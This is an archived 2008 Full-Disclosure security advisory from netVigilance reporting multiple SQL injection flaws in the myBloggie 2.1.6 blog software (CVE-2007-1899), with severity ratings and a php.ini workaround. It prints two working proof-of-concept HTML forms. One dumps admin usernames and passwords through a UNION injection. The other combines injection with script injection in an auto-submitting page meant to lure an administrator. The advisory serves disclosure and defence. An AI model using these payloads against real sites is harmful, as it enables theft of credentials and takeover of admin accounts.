lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <48694171.3020201@netvigilance.com>
Date: Mon, 30 Jun 2008 16:26:25 -0400
From: securityresearch <securityresearch@...vigilance.com>
To: full-disclosure@...ts.grok.org.uk
Subject: myBloggie version 2.1.6 Multiple SQL Injection
	Vulnerability

netVigilance Security Advisory #40

myBloggie version 2.1.6 Multiple SQL Injection Vulnerability
Description:
myBloggie (http://mywebland.com/mybloggie/) is considered one of the 
most simple, user-friendliest yet packed with features Weblog system 
available to date. Built using PHP & mySQL, web most popular scripting 
language & database system enable myBloggie to be installed in any 
webservers.
A security problem in the product allows attackers to commit SQL injection.
External References:
Mitre CVE: CVE-2007-1899 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899
NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899
OSVDB:

Summary:
myBloggie is weblog system built using PHP & mySQL, the webs most 
popular scripting language & database system which enable myBloggie to 
be installed in any webserver.

Successful exploitation requires PHP magic_quotes_gpc set to Off and 
register_globals set to “On”.
Advisory URL:
http://www.netvigilance.com/advisory0040

Release Date: June 30th 2008

Severity/Risk: Medium

CVSS 2.0 Metrics
Access Vector: Network
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS 2.0 Base Score: 5.1

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: SQL Injection.

SecureScout Testcase ID: TC 17969

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. 
This could be exploited to obtain sensitive data, modify database 
contents or acquire administrator’s privileges.

Vendor:
myWebland (http://mywebland.com/)

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.
Workaround:
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off

Example:

SQL Injection Vulnerability 1:
Create html file with the next content:
<html>
<body>
<form 
action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser" 
method="POST">
<input type="submit" name="user_id" value="1 #' UNION SELECT 
CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1 
FROM `mb_user` /*">
</form>
</body>
</html>

REQUEST:
Browse this file and click on the button
REPLY:
<tr><td colspan="3" class="spacer6"></td></tr>
<tr><td></td><td></td><td align="right">
<span class="f10pxgrey">Category : <a class="std" 
href="?mode=viewcat&amp;cat_id=1">
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN 
PASSWORD]</a>
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif" 
alt="" />
<a class="std" href="?mode=viewid&amp;post_id=1">Comments</a>[1] |
<img src="./templates/aura/images/trackback.gif" />

SQL Injection Vulnerability 2:

(SQL Injection + XSS Attack Vulnerability)
Create html file with the next content and place it for example on 
http://somedomain.com/file.html:
<html>
<body onLoad="document.forms(0).submit();">
<form action=" 
http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" 
method="POST"> <input type="hidden" name="post_id" value="-1' UNION 
SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`), 
'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7 
FROM `mb_user`#">
</form>
</body>
</html>
REQUEST:
Induce a Mybloggie admin to browse the malicious page.
http:// somedomain.com/file.html

REPLY:
Page containing username and password for Mybloggie admin account.


Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ